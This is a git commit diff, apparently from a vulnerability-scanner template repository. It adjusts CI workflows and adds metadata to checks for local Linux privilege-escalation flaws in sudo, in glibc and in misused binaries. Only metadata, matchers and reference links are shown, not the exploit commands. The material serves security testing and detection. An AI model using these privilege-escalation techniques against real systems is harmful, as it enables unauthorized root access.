Merge branch 'main' into add-missing-token
commit
27ead949cf
|
@ -1,22 +0,0 @@
|
|||
name: 🗑️ Cache Purge
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
deploy:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
# Wait for 5 minutes
|
||||
- name: Wait for 2 minutes
|
||||
run: sleep 120
|
||||
|
||||
- name: Purge cache
|
||||
uses: jakejarvis/cloudflare-purge-action@master
|
||||
env:
|
||||
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
|
||||
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}
|
|
@ -9,6 +9,7 @@ on:
|
|||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- name: Yamllint
|
||||
|
|
|
@ -11,6 +11,7 @@ on:
|
|||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
|
|
|
@ -9,6 +9,7 @@ on:
|
|||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
|
|
|
@ -9,6 +9,7 @@ on:
|
|||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
|
|
|
@ -9,6 +9,7 @@ on:
|
|||
- 'http/cves/2023/CVE-2023-42344.yaml'
|
||||
- 'http/cves/2023/CVE-2023-45671.yaml'
|
||||
- 'http/cves/2023/CVE-2023-48777.yaml'
|
||||
- 'http/cves/2023/CVE-2023-6895.yaml'
|
||||
- 'http/cves/2024/CVE-2024-0305.yaml'
|
||||
- 'http/cves/2024/CVE-2024-0713.yaml'
|
||||
- 'http/cves/2024/CVE-2024-1021.yaml'
|
||||
|
@ -25,7 +26,9 @@ on:
|
|||
- 'http/default-logins/ibm/ibm-dcec-default-login.yaml'
|
||||
- 'http/default-logins/ibm/ibm-dsc-default-login.yaml'
|
||||
- 'http/default-logins/ibm/ibm-hmc-default-login.yaml'
|
||||
- 'http/default-logins/ibm/imm-default-login.yaml'
|
||||
- 'http/exposed-panels/c2/meduza-stealer.yaml'
|
||||
- 'http/exposed-panels/cisco-unity-panel.yaml'
|
||||
- 'http/exposed-panels/connectwise-panel.yaml'
|
||||
- 'http/exposed-panels/fortinet/fortiauthenticator-detect.yaml'
|
||||
- 'http/exposed-panels/ibm/ibm-dcec-panel.yaml'
|
||||
|
@ -38,6 +41,7 @@ on:
|
|||
- 'http/exposed-panels/opinio-panel.yaml'
|
||||
- 'http/exposed-panels/rocketchat-panel.yaml'
|
||||
- 'http/exposures/configs/sphinxsearch-config.yaml'
|
||||
- 'http/misconfiguration/cloudflare-rocketloader-htmli.yaml'
|
||||
- 'http/misconfiguration/installer/connectwise-setup.yaml'
|
||||
- 'http/technologies/ibm/ibm-decision-runner.yaml'
|
||||
- 'http/technologies/ibm/ibm-decision-server-runtime.yaml'
|
||||
|
@ -49,6 +53,7 @@ on:
|
|||
workflow_dispatch:
|
||||
jobs:
|
||||
triggerRemoteWorkflow:
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Trigger Remote Workflow with curl
|
||||
|
|
|
@ -6,6 +6,7 @@ on:
|
|||
jobs:
|
||||
Update:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- name: Check out repository code
|
||||
uses: actions/checkout@v4
|
||||
|
|
|
@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-38203.yaml
|
|||
http/cves/2023/CVE-2023-42344.yaml
|
||||
http/cves/2023/CVE-2023-45671.yaml
|
||||
http/cves/2023/CVE-2023-48777.yaml
|
||||
http/cves/2023/CVE-2023-6895.yaml
|
||||
http/cves/2024/CVE-2024-0305.yaml
|
||||
http/cves/2024/CVE-2024-0713.yaml
|
||||
http/cves/2024/CVE-2024-1021.yaml
|
||||
|
@ -20,7 +21,9 @@ http/default-logins/ibm/ibm-dcbc-default-login.yaml
|
|||
http/default-logins/ibm/ibm-dcec-default-login.yaml
|
||||
http/default-logins/ibm/ibm-dsc-default-login.yaml
|
||||
http/default-logins/ibm/ibm-hmc-default-login.yaml
|
||||
http/default-logins/ibm/imm-default-login.yaml
|
||||
http/exposed-panels/c2/meduza-stealer.yaml
|
||||
http/exposed-panels/cisco-unity-panel.yaml
|
||||
http/exposed-panels/connectwise-panel.yaml
|
||||
http/exposed-panels/fortinet/fortiauthenticator-detect.yaml
|
||||
http/exposed-panels/ibm/ibm-dcec-panel.yaml
|
||||
|
@ -33,6 +36,7 @@ http/exposed-panels/openvas-panel.yaml
|
|||
http/exposed-panels/opinio-panel.yaml
|
||||
http/exposed-panels/rocketchat-panel.yaml
|
||||
http/exposures/configs/sphinxsearch-config.yaml
|
||||
http/misconfiguration/cloudflare-rocketloader-htmli.yaml
|
||||
http/misconfiguration/installer/connectwise-setup.yaml
|
||||
http/technologies/ibm/ibm-decision-runner.yaml
|
||||
http/technologies/ibm/ibm-decision-server-runtime.yaml
|
||||
|
|
|
@ -32,3 +32,6 @@ files:
|
|||
- http/cves/2020/CVE-2020-28351.yaml
|
||||
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
|
||||
- http/cves/2021/CVE-2021-28164.yaml
|
||||
- http/fuzzing/wordpress-themes-detect.yaml
|
||||
- http/fuzzing/mdb-database-file.yaml
|
||||
- http/fuzzing/iis-shortname.yaml
|
|
@ -9,11 +9,22 @@ info:
|
|||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
|
||||
- https://www.exploit-db.com/exploits/47502
|
||||
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
|
||||
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
|
||||
- http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2019-14287
|
||||
cwe-id: CWE-755
|
||||
epss-score: 0.34299
|
||||
epss-percentile: 0.96958
|
||||
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
vendor: canonical
|
||||
product: ubuntu_linux
|
||||
vendor: sudo_project
|
||||
product: sudo
|
||||
tags: cve,cve2019,sudo,code,linux,privesc,local,canonical
|
||||
|
||||
self-contained: true
|
||||
|
@ -36,4 +47,4 @@ code:
|
|||
- '!contains(code_1_response, "root")'
|
||||
- 'contains(code_2_response, "root")'
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100f4f8e722b5f42a0123c6f1f8f54ac645f9d05fcd3cfef40c38b610291978a5e00221009d44ff15e4eea65e3fcb18aeece52355879b009f9a7246c145abdaf23807e2ea:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950
|
|
@ -10,8 +10,20 @@ info:
|
|||
- https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
|
||||
- https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
|
||||
- https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
|
||||
- http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html
|
||||
- http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-3156
|
||||
cwe-id: CWE-193
|
||||
epss-score: 0.97085
|
||||
epss-percentile: 0.99752
|
||||
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
vendor: sudo_project
|
||||
product: sudo
|
||||
tags: cve,cve2021,sudo,code,linux,privesc,local,kev
|
||||
|
||||
self-contained: true
|
||||
|
@ -28,4 +40,4 @@ code:
|
|||
- "malloc(): memory corruption"
|
||||
- "Aborted (core dumped)"
|
||||
condition: and
|
||||
# digest: 490a00463044022074b8ca1a10aca438432f3b6e55023b9c80357eb5a6f2ac795774b7d44e85188e02201a3af75f86a975548121afe1ab1faf6ade2d1e89d05200b4e6990e97af56af36:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950
|
|
@ -21,8 +21,8 @@ info:
|
|||
cvss-score: 7.8
|
||||
cve-id: CVE-2023-2640
|
||||
cwe-id: CWE-863
|
||||
epss-score: 0.00047
|
||||
epss-percentile: 0.14754
|
||||
epss-score: 0.00174
|
||||
epss-percentile: 0.53697
|
||||
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -54,4 +54,4 @@ code:
|
|||
- '!contains(code_1_response, "(root)")'
|
||||
- 'contains(code_2_response, "(root)")'
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950
|
|
@ -10,16 +10,21 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2023-4911
|
||||
- https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
|
||||
- https://www.youtube.com/watch?v=1iV-CD9Apn8
|
||||
- http://www.openwall.com/lists/oss-security/2023/10/05/1
|
||||
- http://www.openwall.com/lists/oss-security/2023/10/13/11
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2023-4911
|
||||
cwe-id: CWE-787
|
||||
cpe: cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:*
|
||||
cwe-id: CWE-787,CWE-122
|
||||
epss-score: 0.0171
|
||||
epss-percentile: 0.87439
|
||||
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
vendor: glibc
|
||||
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local
|
||||
vendor: gnu
|
||||
product: glibc
|
||||
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev
|
||||
|
||||
self-contained: true
|
||||
code:
|
||||
|
@ -34,4 +39,4 @@ code:
|
|||
- type: word
|
||||
words:
|
||||
- "139" # Segmentation Fault Exit Code
|
||||
# digest: 4a0a004730450220420ab1d35c89225b917a344669e743fa83b79698910c4f87a5124f2dfaae54cd022100d122ece9eaba7f9bfc32d229e79d56b127da02ce4e5cf4034ecebfd9da56a9a2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950
|
|
@ -9,15 +9,21 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6246
|
||||
- https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
|
||||
- https://access.redhat.com/security/cve/CVE-2023-6246
|
||||
- https://bugzilla.redhat.com/show_bug.cgi?id=2249053
|
||||
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2023-6246
|
||||
cwe-id: CWE-787
|
||||
cwe-id: CWE-787,CWE-122
|
||||
epss-score: 0.00383
|
||||
epss-percentile: 0.72435
|
||||
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
vendor: glibc
|
||||
vendor: gnu
|
||||
product: glibc
|
||||
tags: cve,cve2023,code,glibc,linux,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -33,4 +39,4 @@ code:
|
|||
- type: word
|
||||
words:
|
||||
- "127" # Segmentation Fault Exit Code
|
||||
# digest: 4a0a00473045022100fec914f6ee85b53ab611e26476cba7da42e11cdcb33c935a2d003c74c7312b1302207b65c84f8435932f1aa050019f6aaf899442187cf9630df934cf9086bd94a2f6:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
|||
reference:
|
||||
- https://gtfobins.github.io/gtfobins/choom/
|
||||
metadata:
|
||||
max-request: 3
|
||||
verified: true
|
||||
max-request: 3
|
||||
tags: code,linux,choom,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -46,4 +46,4 @@ code:
|
|||
- 'contains(code_2_response, "root")'
|
||||
- 'contains(code_3_response, "root")'
|
||||
condition: or
|
||||
# digest: 4a0a0047304502203b1238ca7d9be64f51e9162022deaf76b02898053cbb3511377e76228d3d79ef0221008b6aa349a17b0a16a0d0949f1797c8e111d2498185b88fe99c326c60c59167c9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
|||
reference:
|
||||
- https://gtfobins.github.io/gtfobins/find/
|
||||
metadata:
|
||||
max-request: 3
|
||||
verified: true
|
||||
max-request: 3
|
||||
tags: code,linux,find,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -46,4 +46,4 @@ code:
|
|||
- 'contains(code_2_response, "root")'
|
||||
- 'contains(code_3_response, "root")'
|
||||
condition: or
|
||||
# digest: 4b0a0048304602210093227e768a659e1747e4dd5d82e25ade3f152549f159b967327082c90677fc5e022100ba7d7a12344d88ac9ec3c0832b25af9d1ef25fe4470e6963b2f3ae814c844e89:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
|||
reference:
|
||||
- https://gtfobins.github.io/gtfobins/lua/
|
||||
metadata:
|
||||
max-request: 3
|
||||
verified: true
|
||||
max-request: 3
|
||||
tags: code,linux,lua,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -46,4 +46,4 @@ code:
|
|||
- 'contains(code_2_response, "root")'
|
||||
- 'contains(code_3_response, "root")'
|
||||
condition: or
|
||||
# digest: 4a0a00473045022033fd3387c3085b4f8e3a7ced68a4e324ba82f7e683a8c29e5ab32c1975a8fe4b02210097eb732caf95609123a361436265388bba8c2c95fcba6ddaf6504d3a5b19c19f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
|||
reference:
|
||||
- https://gtfobins.github.io/gtfobins/mysql/
|
||||
metadata:
|
||||
max-request: 3
|
||||
verified: true
|
||||
max-request: 3
|
||||
tags: code,linux,mysql,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -46,4 +46,4 @@ code:
|
|||
- 'contains(code_2_response, "root")'
|
||||
- 'contains(code_3_response, "root")'
|
||||
condition: or
|
||||
# digest: 4b0a00483046022100fa6772f8e48a5c9ac87ddba3ecc262a59d16d9cba527623da8f5cdf9509e44880221008cff1c5a77c27a1f59d943884498c8d1499da98e6ecf7e1d63851de4ae9fa76c:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
|||
reference:
|
||||
- https://gtfobins.github.io/gtfobins/node/
|
||||
metadata:
|
||||
max-request: 4
|
||||
verified: true
|
||||
max-request: 4
|
||||
tags: code,linux,node,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -53,4 +53,4 @@ code:
|
|||
- 'contains(code_3_response, "root")'
|
||||
- 'contains(code_4_response, "root")'
|
||||
condition: or
|
||||
# digest: 4b0a00483046022100e32f25ba4a83d9d265aa187532f0090ba2fdf1beb89235113b4caeed36413ac30221008ecd529618da3ad2ed65e939b4233529614a005b87fd760bbeeb95de2e78746f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
|||
reference:
|
||||
- https://gtfobins.github.io/gtfobins/rc/
|
||||
metadata:
|
||||
max-request: 3
|
||||
verified: true
|
||||
max-request: 3
|
||||
tags: code,linux,rc,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -46,4 +46,4 @@ code:
|
|||
- 'contains(code_2_response, "root")'
|
||||
- 'contains(code_3_response, "root")'
|
||||
condition: or
|
||||
# digest: 4a0a004730450220665e08a8d241b76abc6c9f908b6c953eeebccc153af1c165958c388f1a57c3eb02210091d8e2364f4c48b2fd9d8b64222760ce398677386e5d185fc86425ea5ed10527:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950
|
|
@ -8,8 +8,8 @@ info:
|
|||
The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.
|
||||
reference: https://gtfobins.github.io/gtfobins/run-parts/
|
||||
metadata:
|
||||
max-request: 3
|
||||
verified: true
|
||||
max-request: 3
|
||||
tags: code,linux,run-parts,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -45,4 +45,4 @@ code:
|
|||
- 'contains(code_2_response, "root")'
|
||||
- 'contains(code_3_response, "root")'
|
||||
condition: or
|
||||
# digest: 490a00463044022055bdbe38258f303b3247dcaaec655d2aca77ff0d5e3d83a8e763840384618a7c02204591a5abce03bc68b647b84a4a4fd59da6d3713256d3494aadc43cf2076778dd:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
|||
reference:
|
||||
- https://gtfobins.github.io/gtfobins/strace/
|
||||
metadata:
|
||||
max-request: 3
|
||||
verified: true
|
||||
max-request: 3
|
||||
tags: code,linux,strace,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -46,4 +46,4 @@ code:
|
|||
- 'contains(code_2_response, "root")'
|
||||
- 'contains(code_3_response, "root")'
|
||||
condition: or
|
||||
# digest: 4a0a004730450221008a56962d3e0bfec8153fae52f4693ee5b8065098d3b7c5e16b5c2f481dcaaeb8022077e7fc1be8079fde76cbf09b10718038a4e013725c9955a91d5b024d02bdd27f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
|||
reference:
|
||||
- https://gtfobins.github.io/gtfobins/torify/
|
||||
metadata:
|
||||
max-request: 3
|
||||
verified: true
|
||||
max-request: 3
|
||||
tags: code,linux,torify,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -46,4 +46,4 @@ code:
|
|||
- 'contains(code_2_response, "root")'
|
||||
- 'contains(code_3_response, "root")'
|
||||
condition: or
|
||||
# digest: 4a0a00473045022100fe967badaa42178c43d6c5f965ebd2205cd5636ddceeece364aedd793b317d1902207ad0bc797b16421928d1ec9016ba53809758b9f7603effab908a27decbc3cc74:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
|||
reference:
|
||||
- https://gtfobins.github.io/gtfobins/view/
|
||||
metadata:
|
||||
max-request: 3
|
||||
verified: true
|
||||
max-request: 3
|
||||
tags: code,linux,view,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -46,4 +46,4 @@ code:
|
|||
- 'contains(code_2_response, "root")'
|
||||
- 'contains(code_3_response, "root")'
|
||||
condition: or
|
||||
# digest: 490a0046304402207dc9a1ca06fcde2705d1a72ee2f792eff2f81f5d00def77fa54eec5d7717c19e02200c984a4f0d0cf94baa16c355ab52265f3dd281cac5bdd92f8ef9242efc087166:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
|||
reference:
|
||||
- https://gtfobins.github.io/gtfobins/xargs/
|
||||
metadata:
|
||||
max-request: 3
|
||||
verified: true
|
||||
max-request: 3
|
||||
tags: code,linux,xargs,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -46,4 +46,4 @@ code:
|
|||
- 'contains(code_2_response, "root")'
|
||||
- 'contains(code_3_response, "root")'
|
||||
condition: or
|
||||
# digest: 490a0046304402205fac35cdd5142e3afd382d38b77be0b7105cfc23884e7ac5cbba8aa91cfc2bb002202b6c7ebae29c5c300052a85a39f3e30b71788d590bc40b797c1ee96c1f00f267:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950
|
|
@ -7,8 +7,8 @@ info:
|
|||
reference:
|
||||
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
|
||||
metadata:
|
||||
max-request: 2
|
||||
verified: true
|
||||
max-request: 2
|
||||
tags: code,linux,privesc,local
|
||||
|
||||
self-contained: true
|
||||
|
@ -42,4 +42,4 @@ code:
|
|||
words:
|
||||
- "Not readable and not writable"
|
||||
negative: true
|
||||
# digest: 490a004630440220516036fa8622068621421ac043a6fb20b6551a6ca3d7851726474cfff7e4d9f902205a1a9ce09b5827f39e2311e6716793a917e29383f5e4d4a4b9a56925afa68e61:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950
|
|
@ -265,6 +265,7 @@
|
|||
{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
|
||||
{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
|
||||
{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
|
||||
{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"}
|
||||
{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
|
||||
{"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"}
|
||||
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
|
||||
|
@ -2170,6 +2171,7 @@
|
|||
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
|
||||
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
|
||||
